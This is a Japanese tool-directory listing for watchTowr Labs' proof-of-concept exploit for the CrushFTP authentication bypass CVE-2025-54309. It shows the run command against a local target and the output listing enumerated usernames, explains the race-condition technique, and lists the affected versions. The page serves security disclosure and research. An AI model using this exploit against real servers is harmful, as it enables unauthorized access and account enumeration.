Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — CVE-2025-54309 の概念実証エクスプロイトです。CrushFTP WebInterface における競合状態を介した認証バイパスを実証し、ユーザーを列挙します。 | Kitploit
ツール/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
脆弱性分析エクスプロイト情報収集ウェブセキュリティペネトレーションテスト認証
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

CVE-2025-54309 の概念実証エクスプロイトです。CrushFTP WebInterface における競合状態を介した認証バイパスを実証し、ユーザーを列挙します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2830年前Kitploit レビュー済み

CVE-2025-54309

CrushFTP 認証バイパスの概念実証(PoC)

技術的詳細については、ブログ記事をご覧ください

検出の動作

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

説明

このスクリプトは、CrushFTP インターフェースに対する CVE-2025-54309 の概念実証です。同じセッション識別子を共有する一連の競合リクエストを作成し、一方のリクエストでユーザー名プロパティを "crushadmin" に設定し、もう一方のリクエストでそのユーザーとして認証済みコマンドを実行することで、この PoC ではユーザー名の一覧を抽出することが可能です。詳細については、[ブログ記事] (https://labs.watchtowr.com/) で説明されています。

影響を受けるバージョン

  • 10.8.5 より前
  • 11 で 11.3.4_23 より前

詳細は CrushFTP アドバイザリ をご覧ください

watchTowr Labs をフォロー

最新のセキュリティ研究については、watchTowr Labs チームをフォローしてください

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
ツールをダウンロード